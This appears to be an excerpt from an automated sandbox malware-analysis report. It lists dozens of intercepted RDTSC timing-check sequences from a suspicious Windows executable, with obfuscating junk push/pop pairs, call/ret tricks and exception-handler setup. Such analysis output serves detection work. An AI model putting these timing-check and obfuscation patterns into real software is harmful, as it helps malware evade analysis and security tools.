Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A38676 second address: A3867C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A36E4C second address: A36E68 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FFA692CA428h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A36E68 second address: A36E6C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A38909 second address: A3890F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A3890F second address: A38914 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A39944 second address: A39949 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A39949 second address: A3995C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a js 00007FFA68B945C8h 0x00000010 push esi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A3995C second address: A39962 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A3E136 second address: A3E13A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A3E13A second address: A3E15D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007FFA692CA429h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A3E474 second address: A3E47B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A3E8B2 second address: A3E8BD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 ja 00007FFA692CA416h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A40AD0 second address: A40ADA instructions: 0x00000000 rdtsc 0x00000002 jo 00007FFA68B945B6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A40ADA second address: A40AED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pop esi 0x0000000a jc 00007FFA692CA436h 0x00000010 push ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A40AED second address: A40AF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A40AF3 second address: A40B06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jl 00007FFA692CA422h 0x0000000b jnl 00007FFA692CA416h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A411D9 second address: A411EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FFA68B945BAh 0x0000000c rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A412BF second address: A412EA instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c push edi 0x0000000d jc 00007FFA692CA418h 0x00000013 push ebx 0x00000014 pop ebx 0x00000015 pop edi 0x00000016 mov eax, dword ptr [eax] 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007FFA692CA420h 0x00000020 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A4184A second address: A4184E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A41A4A second address: A41A65 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFA692CA41Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007FFA692CA41Ch 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A4206F second address: A42073 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A42073 second address: A42077 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A42077 second address: A42080 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A42080 second address: A42086 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A42086 second address: A420B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov dword ptr [esp], ebx 0x00000009 sub esi, 75BEF0A2h 0x0000000f nop 0x00000010 push eax 0x00000011 push edx 0x00000012 jnp 00007FFA68B945CAh 0x00000018 jmp 00007FFA68B945C4h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A420B2 second address: A420C9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFA692CA41Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push esi 0x0000000b push ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A42185 second address: A4218F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007FFA68B945B6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A4218F second address: A42193 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A42257 second address: A4225C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A424A5 second address: A424B5 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FFA692CA416h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A424B5 second address: A424C9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFA68B945BDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A42A66 second address: A42A7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FFA692CA416h 0x0000000a popad 0x0000000b push esi 0x0000000c pushad 0x0000000d popad 0x0000000e pop esi 0x0000000f popad 0x00000010 push eax 0x00000011 pushad 0x00000012 push esi 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A42A7B second address: A42A8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FFA68B945BBh 0x0000000c rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A4347C second address: A43480 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A43480 second address: A4348E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnp 00007FFA68B945BCh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A4456E second address: A44572 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A44572 second address: A44587 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFA68B945BEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A4503B second address: A4503F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A4503F second address: A45049 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A45B08 second address: A45B16 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 ja 00007FFA692CA416h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A458A7 second address: A458B5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFA68B945BAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A45B16 second address: A45B80 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push edi 0x0000000d call 00007FFA692CA418h 0x00000012 pop edi 0x00000013 mov dword ptr [esp+04h], edi 0x00000017 add dword ptr [esp+04h], 00000016h 0x0000001f inc edi 0x00000020 push edi 0x00000021 ret 0x00000022 pop edi 0x00000023 ret 0x00000024 push 00000000h 0x00000026 or dword ptr [ebp+122D1943h], ebx 0x0000002c mov dword ptr [ebp+122D248Ch], edx 0x00000032 push 00000000h 0x00000034 js 00007FFA692CA41Ch 0x0000003a mov dword ptr [ebp+122D253Dh], edx 0x00000040 xchg eax, ebx 0x00000041 pushad 0x00000042 pushad 0x00000043 jmp 00007FFA692CA429h 0x00000048 js 00007FFA692CA416h 0x0000004e popad 0x0000004f pushad 0x00000050 push eax 0x00000051 push edx 0x00000052 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A45B80 second address: A45B86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A45B86 second address: A45B9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FFA692CA41Fh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A4CEF2 second address: A4CEF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A4CEF6 second address: A4CEFA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A4CEFA second address: A4CF3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 mov di, CB6Ch 0x0000000b push 00000000h 0x0000000d mov bh, A0h 0x0000000f push 00000000h 0x00000011 push 00000000h 0x00000013 push esi 0x00000014 call 00007FFA68B945B8h 0x00000019 pop esi 0x0000001a mov dword ptr [esp+04h], esi 0x0000001e add dword ptr [esp+04h], 0000001Dh 0x00000026 inc esi 0x00000027 push esi 0x00000028 ret 0x00000029 pop esi 0x0000002a ret 0x0000002b xchg eax, esi 0x0000002c push eax 0x0000002d push edx 0x0000002e jnl 00007FFA68B945B8h 0x00000034 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A4CF3B second address: A4CF4E instructions: 0x00000000 rdtsc 0x00000002 js 00007FFA692CA418h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push edi 0x00000012 pop edi 0x00000013 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A479AC second address: A479C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 jnl 00007FFA68B945B6h 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f popad 0x00000010 push eax 0x00000011 pushad 0x00000012 push ecx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A4CF4E second address: A4CF54 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A479C1 second address: A479E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FFA68B945C9h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A4C109 second address: A4C1C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push edx 0x00000008 jmp 00007FFA692CA420h 0x0000000d pop edx 0x0000000e popad 0x0000000f push eax 0x00000010 jmp 00007FFA692CA41Eh 0x00000015 nop 0x00000016 mov ebx, dword ptr [ebp+1247A632h] 0x0000001c push dword ptr fs:[00000000h] 0x00000023 push edi 0x00000024 jng 00007FFA692CA41Ch 0x0000002a je 00007FFA692CA416h 0x00000030 pop edi 0x00000031 mov dword ptr fs:[00000000h], esp 0x00000038 call 00007FFA692CA424h 0x0000003d jmp 00007FFA692CA41Fh 0x00000042 pop edi 0x00000043 push edi 0x00000044 or dword ptr [ebp+122D3594h], edx 0x0000004a pop ebx 0x0000004b mov eax, dword ptr [ebp+122D16E5h] 0x00000051 mov edi, dword ptr [ebp+122D1B46h] 0x00000057 push FFFFFFFFh 0x00000059 push 00000000h 0x0000005b push esi 0x0000005c call 00007FFA692CA418h 0x00000061 pop esi 0x00000062 mov dword ptr [esp+04h], esi 0x00000066 add dword ptr [esp+04h], 0000001Bh 0x0000006e inc esi 0x0000006f push esi 0x00000070 ret 0x00000071 pop esi 0x00000072 ret 0x00000073 mov dword ptr [ebp+12473594h], ecx 0x00000079 push eax 0x0000007a push eax 0x0000007b push edx 0x0000007c jng 00007FFA692CA41Ch 0x00000082 jnp 00007FFA692CA416h 0x00000088 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A4DFEC second address: A4DFF0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A4DFF0 second address: A4DFF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A4DFF9 second address: A4DFFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A4DFFF second address: A4E01B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c jmp 00007FFA692CA41Fh 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A4E01B second address: A4E021 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A4F18F second address: A4F1AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FFA692CA427h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A4F1AA second address: A4F231 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FFA68B945B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push esi 0x00000010 call 00007FFA68B945B8h 0x00000015 pop esi 0x00000016 mov dword ptr [esp+04h], esi 0x0000001a add dword ptr [esp+04h], 0000001Ch 0x00000022 inc esi 0x00000023 push esi 0x00000024 ret 0x00000025 pop esi 0x00000026 ret 0x00000027 mov edi, 782820E0h 0x0000002c push 00000000h 0x0000002e push 00000000h 0x00000030 push ebx 0x00000031 call 00007FFA68B945B8h 0x00000036 pop ebx 0x00000037 mov dword ptr [esp+04h], ebx 0x0000003b add dword ptr [esp+04h], 0000001Dh 0x00000043 inc ebx 0x00000044 push ebx 0x00000045 ret 0x00000046 pop ebx 0x00000047 ret 0x00000048 jmp 00007FFA68B945C7h 0x0000004d push 00000000h 0x0000004f mov edi, ebx 0x00000051 push esi 0x00000052 push eax 0x00000053 mov di, D3E1h 0x00000057 pop ebx 0x00000058 pop edi 0x00000059 push eax 0x0000005a push ecx 0x0000005b pushad 0x0000005c push ebx 0x0000005d pop ebx 0x0000005e push eax 0x0000005f push edx 0x00000060 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A50248 second address: A5025C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FFA692CA41Fh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A5025C second address: A50281 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push esi 0x0000000b jmp 00007FFA68B945C9h 0x00000010 pop esi 0x00000011 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A50281 second address: A5028B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007FFA692CA416h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A50317 second address: A5031B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A5031B second address: A50338 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FFA692CA424h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A54AE5 second address: A54AFF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FFA68B945C6h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A53D67 second address: A53D6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A53D6F second address: A53DF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 mov dword ptr [esp], eax 0x00000009 push dword ptr fs:[00000000h] 0x00000010 push 00000000h 0x00000012 push eax 0x00000013 call 00007FFA68B945B8h 0x00000018 pop eax 0x00000019 mov dword ptr [esp+04h], eax 0x0000001d add dword ptr [esp+04h], 0000001Ah 0x00000025 inc eax 0x00000026 push eax 0x00000027 ret 0x00000028 pop eax 0x00000029 ret 0x0000002a xor edi, dword ptr [ebp+1246AB73h] 0x00000030 mov dword ptr fs:[00000000h], esp 0x00000037 mov ebx, dword ptr [ebp+122D20BEh] 0x0000003d mov eax, dword ptr [ebp+122D02C5h] 0x00000043 mov bx, cx 0x00000046 push FFFFFFFFh 0x00000048 push 00000000h 0x0000004a push edx 0x0000004b call 00007FFA68B945B8h 0x00000050 pop edx 0x00000051 mov dword ptr [esp+04h], edx 0x00000055 add dword ptr [esp+04h], 0000001Dh 0x0000005d inc edx 0x0000005e push edx 0x0000005f ret 0x00000060 pop edx 0x00000061 ret 0x00000062 jmp 00007FFA68B945BFh 0x00000067 push eax 0x00000068 push ecx 0x00000069 push eax 0x0000006a push edx 0x0000006b push esi 0x0000006c pop esi 0x0000006d rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A56B68 second address: A56B7E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFA692CA41Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A56B7E second address: A56BFD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFA68B945BCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edx 0x0000000a push edi 0x0000000b pop edi 0x0000000c pop edx 0x0000000d popad 0x0000000e nop 0x0000000f push 00000000h 0x00000011 push edi 0x00000012 call 00007FFA68B945B8h 0x00000017 pop edi 0x00000018 mov dword ptr [esp+04h], edi 0x0000001c add dword ptr [esp+04h], 00000014h 0x00000024 inc edi 0x00000025 push edi 0x00000026 ret 0x00000027 pop edi 0x00000028 ret 0x00000029 push ebx 0x0000002a mov dword ptr [ebp+1246AB98h], edi 0x00000030 pop ebx 0x00000031 push 00000000h 0x00000033 mov dword ptr [ebp+122D18FAh], ebx 0x00000039 push 00000000h 0x0000003b push ecx 0x0000003c sub dword ptr [ebp+122D2658h], ecx 0x00000042 pop ebx 0x00000043 xchg eax, esi 0x00000044 jno 00007FFA68B945C4h 0x0000004a push eax 0x0000004b push eax 0x0000004c push edx 0x0000004d push eax 0x0000004e push edx 0x0000004f jmp 00007FFA68B945C9h 0x00000054 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A56BFD second address: A56C13 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFA692CA422h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A56C13 second address: A56C18 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A54C79 second address: A54C7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A54C7E second address: A54CA9 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FFA68B945BCh 0x00000008 jg 00007FFA68B945B6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 push edx 0x00000014 jmp 00007FFA68B945C6h 0x00000019 pop edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A54CA9 second address: A54D22 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFA692CA41Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a mov di, ax 0x0000000d pushad 0x0000000e movsx ecx, si 0x00000011 popad 0x00000012 push dword ptr fs:[00000000h] 0x00000019 mov ebx, dword ptr [ebp+122D36C1h] 0x0000001f mov dword ptr fs:[00000000h], esp 0x00000026 adc bx, 4D25h 0x0000002b jmp 00007FFA692CA429h 0x00000030 mov eax, dword ptr [ebp+122D1709h] 0x00000036 push ecx 0x00000037 xor edi, dword ptr [ebp+122D3B25h] 0x0000003d pop edi 0x0000003e pushad 0x0000003f xor dword ptr [ebp+122D2913h], edx 0x00000045 adc eax, 754BABCDh 0x0000004b popad 0x0000004c push FFFFFFFFh 0x0000004e xor edi, dword ptr [ebp+122D1B3Bh] 0x00000054 push eax 0x00000055 pushad 0x00000056 push ebx 0x00000057 push esi 0x00000058 pop esi 0x00000059 pop ebx 0x0000005a push eax 0x0000005b push edx 0x0000005c push ebx 0x0000005d pop ebx 0x0000005e rdtsc
